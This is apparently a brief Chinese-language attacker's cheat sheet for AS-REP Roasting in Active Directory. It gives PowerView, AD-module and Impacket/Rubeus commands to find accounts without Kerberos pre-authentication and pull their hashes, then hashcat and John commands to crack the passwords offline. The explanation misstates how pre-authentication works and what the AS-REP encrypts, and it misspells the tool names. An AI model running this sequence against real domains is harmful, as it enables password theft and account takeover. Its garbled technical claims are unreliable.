AS-REP Roasting

kerberos预认证

kerberos 预认证是在AS认证过程中检验AS-REQ中的用户名/IP和发出请求的用户名/IP是否相同，如果不同会停止后续协议过程，而且值得注意的是预认证错误次数达到阈值也会导致账户被锁定。

AS-REP Roasting

AS-REP Roasting原理

由于AS-REP中会使用的是用户Hash加密TGT，所以拿到TGT后可以离线爆破用户密码，而且没有预认证设置的情况下我们可以以域内其他用户身份请求TGT，离线破解出其他域用户密码

枚举

// Powerview
Get-DomainUser -PreauthNotRequired
// ActiveDirectory Powershell Module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
// Imapcket-GetNPUser
Imapcket-GetNPUser -dc-ip <dc-ip> <Domain>/<UserName>

获取目标用户的密码hash

// Imapcket-GetNPUser 伪造身份请求目标用户TGT
Imapcket-GetNPUser -dc-ip <dc-ip> -request -outputfile <OutFile> <Domain>/<Username>
// Rubues 伪造身份请求目标用户TGT
Rubues.exe asreproast /user:<UserName> /outfile:<outfile>

Hash破解

// Hashcat破解
hashcat -m 18200 <hash_file> <passwd_file> --force
// john破解
john <hash_file> --wordlist=<passwd_file>